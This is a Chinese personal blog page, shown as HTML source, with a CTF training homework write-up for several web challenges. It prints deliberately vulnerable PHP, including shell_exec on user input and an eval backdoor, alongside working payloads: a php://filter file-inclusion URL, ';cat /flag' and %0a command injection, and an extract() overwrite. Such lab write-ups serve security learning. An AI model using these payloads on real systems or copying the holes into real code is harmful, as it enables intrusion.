<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/file/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/file/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/file/favicon-16x16.png">
  <link rel="mask-icon" href="/file/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"czlz.net","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="前言周未还有作业。。累呀">
<meta property="og:type" content="article">
<meta property="og:title" content="CTF特训营(周末作业二)">
<meta property="og:url" content="https://czlz.net/2020/jxsw_txy_web_20200816/index.html">
<meta property="og:site_name" content="粗制乱造的个人网站">
<meta property="og:description" content="前言周未还有作业。。累呀">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://czlz.net/2020/jxsw_txy_web_20200816/1_2.png">
<meta property="og:image" content="https://czlz.net/2020/jxsw_txy_web_20200816/1_1.png">
<meta property="og:image" content="https://czlz.net/2020/jxsw_txy_web_20200816/1_3.png">
<meta property="og:image" content="https://czlz.net/2020/jxsw_txy_web_20200816/2_1.png">
<meta property="og:image" content="https://czlz.net/2020/jxsw_txy_web_20200816/3_1.png">
<meta property="og:image" content="https://czlz.net/2020/jxsw_txy_web_20200816/3_2.png">
<meta property="og:image" content="https://czlz.net/2020/jxsw_txy_web_20200816/4_1.png">
<meta property="og:image" content="https://czlz.net/2020/jxsw_txy_web_20200816/4_2.png">
<meta property="og:image" content="https://czlz.net/2020/jxsw_txy_web_20200816/4_3.png">
<meta property="og:image" content="https://czlz.net/2020/jxsw_txy_web_20200816/6_1.png">
<meta property="og:image" content="https://czlz.net/2020/jxsw_txy_web_20200816/6_2.png">
<meta property="article:published_time" content="2020-08-15T16:00:00.000Z">
<meta property="article:modified_time" content="2020-08-17T00:51:20.241Z">
<meta property="article:author" content="粗制乱造">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="练习题">
<meta property="article:tag" content="WEB">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://czlz.net/2020/jxsw_txy_web_20200816/1_2.png">

<link rel="canonical" href="https://czlz.net/2020/jxsw_txy_web_20200816/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>CTF特训营(周末作业二) | 粗制乱造的个人网站</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">粗制乱造的个人网站</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">杂七杂八的一堆东西</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-python">

    <a href="/pyodide/" rel="section"><i class="fa fa-user fa-fw"></i>在线Python3.8</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://czlz.net/2020/jxsw_txy_web_20200816/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/file/avatar.png">
      <meta itemprop="name" content="粗制乱造">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="粗制乱造的个人网站">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          CTF特训营(周末作业二)
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-08-16 00:00:00" itemprop="dateCreated datePublished" datetime="2020-08-16T00:00:00+08:00">2020-08-16</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-08-17 08:51:20" itemprop="dateModified" datetime="2020-08-17T08:51:20+08:00">2020-08-17</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/%E7%AC%94%E8%AE%B0/" itemprop="url" rel="index"><span itemprop="name">笔记</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/%E7%AC%94%E8%AE%B0/WEB/" itemprop="url" rel="index"><span itemprop="name">WEB</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <!-- toc -->
<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>周未还有作业。。累呀</p>
<a id="more"></a>
<h1 id="作业一"><a href="#作业一" class="headerlink" title="作业一"></a>作业一</h1><h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><p>拿到题目，先看看有没有源码泄露<br><img src="1_2.png" alt="作业"><br>扫描了一下。没发现有啥东西。<br><img src="1_1.png" alt="作业"><br>随便翻一翻。发现有文件包含。</p>
<h2 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;47.102.118.76:9970&#x2F;index.php?path&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;flag.php</span><br></pre></td></tr></table></figure>
<p>试一下。</p>
<h2 id="拿到flag"><a href="#拿到flag" class="headerlink" title="拿到flag"></a>拿到flag</h2><p><img src="1_3.png" alt="作业"><br>flag{lfis0easy}</p>
<h1 id="作业二"><a href="#作业二" class="headerlink" title="作业二"></a>作业二</h1><h2 id="分析-1"><a href="#分析-1" class="headerlink" title="分析"></a>分析</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">highlight_file(<span class="string">'index.php'</span>);</span><br><span class="line">$direc = $_GET[<span class="string">'direc'</span>];</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($direc))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">''</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">'/[^a-zA-A0-9 ;\/]/'</span>,$direc))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">'whoops'</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($direc))&#123;</span><br><span class="line">    <span class="keyword">echo</span>(shell_exec(<span class="string">'ls '</span>.$direc));</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>源码直接就给出了这也没啥好说的了。<br>只能输入a-z,A-A,0-9,空格和;号</p>
<h2 id="payload-1"><a href="#payload-1" class="headerlink" title="payload"></a>payload</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;47.102.118.76:9971&#x2F;?direc&#x3D;;cat &#x2F;flag</span><br></pre></td></tr></table></figure>
<h2 id="flag"><a href="#flag" class="headerlink" title="flag"></a>flag</h2><p><img src="2_1.png" alt="作业"><br>直接拿到flag{418437d0-0a89-4a17-9b13-bdb165718312}</p>
<h1 id="作业三"><a href="#作业三" class="headerlink" title="作业三"></a>作业三</h1><h2 id="分析-2"><a href="#分析-2" class="headerlink" title="分析"></a>分析</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">extract($_GET);</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">empty</span>($f1ag))</span><br><span class="line">&#123;</span><br><span class="line">$combination = trim(file_get_contents($filename));</span><br><span class="line"><span class="keyword">if</span> ($f1ag === $combination)</span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;p&gt;Hello:"</span> .<span class="string">" $combination!?&lt;/p&gt;"</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;p&gt;Congratulation.flag is:"</span> .<span class="string">" $flag&lt;/p&gt;"</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;p&gt;sorry!&lt;/p&gt;"</span>;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>读取的文件内容要与用户输入的f1ag相等(这里是f1ag而不是flag，好坑呀)</p>
<h2 id="payload-2"><a href="#payload-2" class="headerlink" title="payload"></a>payload</h2><p>这好办呀，直接使用php伪协议</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;47.102.118.76:9972&#x2F;?f1ag&#x3D;111&amp;filename&#x3D;data:text&#x2F;plain,111</span><br></pre></td></tr></table></figure>
<p>失败了一点反应也没有。扫描一下看看有没有什么可用的文件<br><img src="3_1.png" alt="作业"><br>有个robots.txt可用。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;47.102.118.76:9972&#x2F;?f1ag&#x3D;havefun&amp;filename&#x3D;robots.txt</span><br></pre></td></tr></table></figure>
<h2 id="flag-1"><a href="#flag-1" class="headerlink" title="flag"></a>flag</h2><p><img src="3_2.png" alt="作业"><br>flag{0643cfb7a9066fc0de315f34117bd07e}</p>
<h1 id="作业四"><a href="#作业四" class="headerlink" title="作业四"></a>作业四</h1><h2 id="分析-3"><a href="#分析-3" class="headerlink" title="分析"></a>分析</h2><p>题目就一个</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">give me ip!</span><br></pre></td></tr></table></figure>
<p>提交一下</p>
<blockquote>
<p><a href="http://47.102.118.76:9973/?ip=127.0.0.1" target="_blank" rel="noopener">http://47.102.118.76:9973/?ip=127.0.0.1</a></p>
</blockquote>
<p><img src="4_1.png" alt="作业"><br>好吧看来是命令执行了。<br>测试使用;，|来执行多条命令，失败了。<br>使用%0a然后成功了。<br><img src="4_2.png" alt="作业"></p>
<h2 id="payload-3"><a href="#payload-3" class="headerlink" title="payload"></a>payload</h2><p><img src="4_3.png" alt="作业"></p>
<h2 id="flag-2"><a href="#flag-2" class="headerlink" title="flag"></a>flag</h2><p>flag{2f48397a0086}</p>
<h1 id="作业五"><a href="#作业五" class="headerlink" title="作业五"></a>作业五</h1><h2 id="分析-4"><a href="#分析-4" class="headerlink" title="分析"></a>分析</h2><h1 id="作业六"><a href="#作业六" class="headerlink" title="作业六"></a>作业六</h1><h2 id="分析-5"><a href="#分析-5" class="headerlink" title="分析"></a>分析</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;&lt;head&gt;&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;img src=<span class="string">'image/best_language.gif'</span>&gt;&lt;br&gt; </span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">eval</span>(stripslashes($_REQUEST[<span class="string">'eval'</span>]));</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
<p>直接给了一个后门呀。无语了</p>
<h2 id="payload-4"><a href="#payload-4" class="headerlink" title="payload"></a>payload</h2><p><img src="6_1.png" alt="作业"><br>为了防止stripslashes过滤掉特殊的字符，将蚁剑设置为base64编码模式。<br>但是发现不能访问根目录。</p>
<h2 id="flag-3"><a href="#flag-3" class="headerlink" title="flag"></a>flag</h2><p><img src="6_2.png" alt="作业"><br>flag{a42aa0b8ac38}</p>

    </div>

    
    
    
        <div class="reward-container">
  <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/file/weixin.png" alt="粗制乱造 微信支付">
        <p>微信支付</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/file/zfb.png" alt="粗制乱造 支付宝">
        <p>支付宝</p>
      </div>

  </div>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/%E7%BB%83%E4%B9%A0%E9%A2%98/" rel="tag"># 练习题</a>
              <a href="/tags/WEB/" rel="tag"># WEB</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/jxsw_txy_web_20200815/" rel="prev" title="CTF特训营(周末作业)">
      <i class="fa fa-chevron-left"></i> CTF特训营(周末作业)
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/jxsw_txy_web_20200817/" rel="next" title="CTF特训营(WEB序列化)">
      CTF特训营(WEB序列化) <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#作业一"><span class="nav-number">2.</span> <span class="nav-text">作业一</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#分析"><span class="nav-number">2.1.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#payload"><span class="nav-number">2.2.</span> <span class="nav-text">payload</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#拿到flag"><span class="nav-number">2.3.</span> <span class="nav-text">拿到flag</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#作业二"><span class="nav-number">3.</span> <span class="nav-text">作业二</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#分析-1"><span class="nav-number">3.1.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#payload-1"><span class="nav-number">3.2.</span> <span class="nav-text">payload</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#flag"><span class="nav-number">3.3.</span> <span class="nav-text">flag</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#作业三"><span class="nav-number">4.</span> <span class="nav-text">作业三</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#分析-2"><span class="nav-number">4.1.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#payload-2"><span class="nav-number">4.2.</span> <span class="nav-text">payload</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#flag-1"><span class="nav-number">4.3.</span> <span class="nav-text">flag</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#作业四"><span class="nav-number">5.</span> <span class="nav-text">作业四</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#分析-3"><span class="nav-number">5.1.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#payload-3"><span class="nav-number">5.2.</span> <span class="nav-text">payload</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#flag-2"><span class="nav-number">5.3.</span> <span class="nav-text">flag</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#作业五"><span class="nav-number">6.</span> <span class="nav-text">作业五</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#分析-4"><span class="nav-number">6.1.</span> <span class="nav-text">分析</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#作业六"><span class="nav-number">7.</span> <span class="nav-text">作业六</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#分析-5"><span class="nav-number">7.1.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#payload-4"><span class="nav-number">7.2.</span> <span class="nav-text">payload</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#flag-3"><span class="nav-number">7.3.</span> <span class="nav-text">flag</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="粗制乱造"
      src="/file/avatar.png">
  <p class="site-author-name" itemprop="name">粗制乱造</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">43</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">37</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">59</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">粗制乱造</span>
</div>
  <div class="powered-by">由 <a href="https://czlz.net/" class="theme-link">czlz.net</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
